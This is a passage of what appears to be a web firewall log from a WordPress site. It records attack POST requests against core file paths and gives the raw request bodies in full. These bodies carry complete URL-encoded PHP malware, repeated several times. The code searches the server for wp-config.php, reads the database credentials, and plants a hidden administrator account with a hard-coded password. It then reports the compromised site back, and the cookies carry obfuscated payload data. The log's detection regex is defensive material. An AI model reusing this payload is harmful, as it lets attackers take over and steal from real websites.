%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/wp-includes\/customize\/class-wp-customize-nav-menus-panel.php HTTP\/1.1\nsec-fetch-user:?1\nsec-fetch-dest:document\ncontent-length:12640\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\ncookie:4=e367ba33cbb513d4c0b57eb3026dd8cc; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvnxRvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzSwL2IjqTIxVwgcMvuznJkyK3O1qS9wo250MJ50pltxpPjxLlxcr2yhL2k1MTHtWUN7DUIhoTyhnltxpPx7MKucqQg9sK1xnJHbVvSho3E3paEvoPRvXGf=; 1=53; 0=71\nsec-ch-ua:\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"101\", \"Microsoft Edge\";v=\"101\"\nsec-ch-ua-mobile:?0\nsec-ch-ua-platform:\"Windows\"\ncontent-type:application\/x-www-form-urlencoded\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nsec-fetch-site:none\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/101.0.4951.64 Safari\/537.36 Edg\/101.0.1210.47\nsec-fetch-mode:navigate\n\njA=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 00:09:53","213.209.159.254","POST","\/wp-includes\/sodium_compat\/src\/Core32\/X25519.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.3 Safari\/605.1.15","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> tA:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/wp-includes\/sodium_compat\/src\/Core32\/X25519.php HTTP\/1.1\ncontent-type:application\/x-www-form-urlencoded\ncookie:4=4718f09e2a2be7b472f3efbae62d97b4; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvqRRvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzAlMJS0MJDvB2yzXTMcoTIspUI0K2AioaEyoaEmXPEjYPEwXFy7nJ5woUIxMFNxpQgNqJ5fnJ5eXPEjXGgyrTy0B319sJEcMFtvVJ5iqUqlqTWfVFVcBj==; 1=53; 0=71\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.3 Safari\/605.1.15\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\naccept-encoding:gzip,deflate\ncontent-length:12640\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\n\ntA=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5C